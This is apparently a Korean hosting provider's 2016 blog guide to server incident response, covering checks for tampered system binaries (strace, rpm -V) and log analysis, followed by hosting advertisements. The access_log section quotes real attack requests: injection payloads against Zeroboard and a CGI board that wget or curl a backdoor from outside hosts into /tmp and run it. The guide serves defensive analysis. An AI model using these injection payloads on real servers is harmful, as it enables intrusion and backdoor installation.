[Global Services]/해외서비스

홍콩,일본 서버호스팅 피싱대응 가이드 - 시스템 프로그램 파일 변조 점검,로그분석

이호스트ICT 2016. 4. 12. 18:56

 

 

 

 

시스템 프로그램 파일 변조 점검


루트킷에 의해 변조되는 경우를 포함하여 Trojan으로 자주 변경되는 시스템 파일들과 의심스러운 파일들이 점검대상이 되는데, 자동화된 프로그램 인 chkrootkit이나 RootkitHunter을 이용하면 쉽게 점검할 수 있습니다.

또는 다음과 같이 수작업으로도 확인 가능합니다.


[ system call 추적 ]

[root@localhost var]# strace -e trace=open ps

open“( /etc/ld.so.preload”, O_RDONLY) = -1 ENOENT (No such file or

directory)

open“( /etc/ld.so.cache”, O_RDONLY) = 3

open“( /lib/i686/libc.so.6”, O_RDONLY) = 3

open“( /dev/ttyop”, O_RDONLY) = 3


[ 파일의 무결성 검사 ]

RedHat계열의 경우 rpm커맨드를 이용해 파일 변경여부 점검가능


#rpm -V fileutils ← 패키지명

.M....G. /bin/df

S.5...GT /bin/ls

S.5....T c /etc/profile.d/colorls.sh

..5...GT /usr/bin/dir

[ 결과보기 ]

s : 프로그램의 사이즈가 변경, 5 : md5 checksum 값이 변경

T : 파일의 mtime 값이 변경


<참고 : 변경된 바이너리 복구방법 중 하나 - 포함된 패키지 강제설치>

- 변경된 바이너리가 포함된 패키지명 확인: #rpm -qf 바이너리명

예) [root@jjgosi board]# rpm -qf /bin/ps

     procps-2.0.7-8

- 강제 재설치 : # rpm -Uhv --force procps-2.0.7-8.rpm


로그 분석


접속자의 IP나 요청한 서비스의 성공여부, 시스템의 운영상 장애 등 로그를 통해 파악할 수 있는 사항은 많습니다. 관리자가 수동으로 로그파일을 분석하여 필요한 정보를 추출하는 방법은 로그분석 툴 보다 다양한 정보를 획득할 수 있고, 로그분석 툴을 이용하면 사람의 수작업보다 좀 더 신속하고 정확할 수 있다는 장단점이 있습니다.


그러나 공격에 성공하여 권한을 획득하면 로그 삭제 또는 변조했을 가능성이 크기 때문에 로그를 100%로 신뢰할 수는 없습니다.


[ .bash_history 로그 ]

bash 쉘을 이용하는 경우 사용자가 시스템에서 실행시킨 명령어가 모두

.bash_history 파일에 기록되므로, root나 최근 추가된 계정 등 의심스러

운 계정의 .bash_history 파일을 분석



[ 웹 access_log 로그 ]


최근 웹 어플리케이션 취약점을 이용해 웹서버 실행권한인 nobody나 apache 또는 daemon 등의 권한을 획득한 뒤 nobody 등의 권한으로 파일 업로드 및 실행이 가능한 /tmp, /var/tmp, /dev/shm 등의 디렉토리에 파일을 다운로드 받아 실행하는 형태의 사고가 많이 발생하고 있습니다.


􀙊 Apache 디폴트 access_log Format : “%h%l%u%t\”%r\”%>s%b”

h : remote Host l : logname u : user t : time

r : Firstline of request s : status b : byte sent


예) 제로보드 취약점 공격로그

print_category.php 파일의 injection 취약점을 이용해 백도어 프로그램(r0nin)을 /tmp 디렉토리에 업로드한 뒤 실행권한을 부여해 실행


/zboard/include/print_category.php?setup

=1&dir=http://www.~중략.com.xx/newcmd.gif?&cmd

=cd%20/tmp%20;%20wget%20http://nickvicq.xxx.net/BD/r0nin

HTTP/1.1”200 4892

/zboard/include/print_category.php?setup

=1&dir=http://www.~중략.com.br/newcmd.gif?&cmd

=cd%20/tmp%20;%20chmod%20777%20r0nin%20;%20./r0nin HTTP/1.1”

200 4204


access_log.1:xxx.xxx.201.79 - - [28/Jun/2006:22:37:37 +0900] “GET

/cgi-bin/technote/main.cgi?down_num=1078999704&board=INT_

BOARD&command=down_load&filename=index.htm|cd%20..;cd%20..;

cd%20..;cd%20..;cd%20..;cd%20..;cd%20..;cd%20tmp;curl%20xxx.jinonet.

ru%20-o%20cbd;perl%20cbd%20xxx.xxx.222.21 | HTTP/1.1”200 0


[ messages, secure 로그 ]


허가되지 않는 사용자가 원격에서 접속한 서비스(데몬)와 IP를 확인하고 접속성공(공격성공) 여부를 확인하는데도 도움이 됩니다.

예) 중국 IP로부터 8월 6일 10시 22분경 map, rpc 등 시스템에서 가지고 있을 법하거나 쉬운 패스워드를 사용하는 계정을 brute force공격(무작위로 대입)하여 몇 분 동안 ssh 접속시도 로그가 수십여 라인의 로그가 남겨짐


Aug 6 10:22:30 test sshd[7939]: Could not reverse map address

60.18.161.58

Aug 6 10:22:32 test sshd[7939]: Failed password for rpc from

60.18.161.58 port 28804 ssh2

~ 이하 생략


[ xferlog 로그 ]

FTP를 이용해 송수신한 파일명, 원격호스트, 전송방향, 접근모드, 사용자 계정 등의 정보를 확인할 수 있습니다.

예) 원격 호스트 test.abc.com에 ftp서비스로 접속하여 /home/test로 파일사이즈 가 14859인 tool.tar 파일 다운로드 한 로그


Sat Apr 21 00:53:44 2005 1 test.abc.com 14859 /home/test/tool.tar b _o r root ftp 0 *


[ last 로그 ]

last 명령어를 이용하면 해당 서버를 이용하는 각 계정 사용자들의 서버에 접속한 시간과 IP주소를 확인할 수 있습니다.

last에서 보이는 것은 ftp나 telnet, ssh 등 인증 후 접속에 성공한 로그만 남게 된다는 점을 주의해야 합니다. 또한 last에서 보이는 로그는 현재 속한 달의 로그만 보이게 되므로 지난달의 last 로그를 보려면 # last -f/var/log/wtmp.1과 같이 실행하면 됩니다.

 

 

 

 

보다 안정적인 국내/해외서비스를 이용하길 원하신다면 정답은 이호스트IDC에 있습니다. 

 

                    국내(한국) 서버호스팅                         일본 서버호스팅
 ○ Intel® Xeon® Octa Core E5-2670 x 2CPU
     24GB DDR RAM, 1TB SATA3 HDD, 1G / 10Mbps
 ○ Intel Xeon Quad Core L5520 x 2CPU (센다이)
     24GB DDR RAM , 1TB SATA3 HDD 구성
 ○ Intel® Xeon® Quad Core L5520 x 2CPU
     24GB DDR RAM, 1TB SATA3 HDD, 1G / 10Mbps
 ○ Intel Xeon Quad Core E3-1260L 2.40 GHz (도쿄)
     8GB DDR RAM ,  1TB SATA3 , 15Mbps
 ○ Intel® Xeon® Quad Core E3 1230
     8GB DDR RAM, 1TB SATA3 HDD, 1G / 10Mbps
 ○ Intel Xeon Hexa(Six) Core L5640 x 2CPU (센다이)
     24GB DDR RAM , 1TB SATA3 HDD 구성
                        국내 코로케이션             일본 서버호스팅의 필수 보안서비스
 1U 80,000원 / 2U 100,000원 / 4U 130,000원
 쿼터 220,000원 / 하프 370,000원 / 풀 670,000원
      DDoS(디도스) 보안서비스 + 웹방화벽 패키지
                 서비스 문의(070-7600-5513)
 1. 디도스 우회 proxy 보안서비스를 통한 웹서버 IP 숨김지원
                        무료 보안 컨설팅  2. 웹취약점을 통한 로그인 탈취 및 데이터
    손실 방어를 위한 실시간 웹방화벽 차단서비스
      귀사의 서버에 보안침해를 경험하셨거나,
      보안취약점 점검을 받아보시고자 하시면
      언제든지 전화 및 메일 주시면 보안취약성
      점검을 통한 보안레포트를 제공해드리겠습니다.
      보안취약성 점검을 위한 무상장비는
      웹방화벽, IPS 무상 지원해드립니다.
                        홍콩 서버호스팅
 ○ Intel Xeon E3-1230Lv3 Core
     8GB DDR RAM / 500GB SATA 구성
 ○ Intel Xeon E3-1230Lv3 Core
     8GB DDR RAM / 128 SSD 구성
                                                              서비스문의
 ◎ IDC사업부 : 070-7600-5513(3095, 7311)  ◎ 메일주소 : request@ehostidc.co.kr
 ◎ 스카이프   : Sales_Team_EhostIDC ( 또는 '이호스트' 검색)
 ◎ 신청문의   : http://cc.ehostidc.co.kr/index.php?/cart/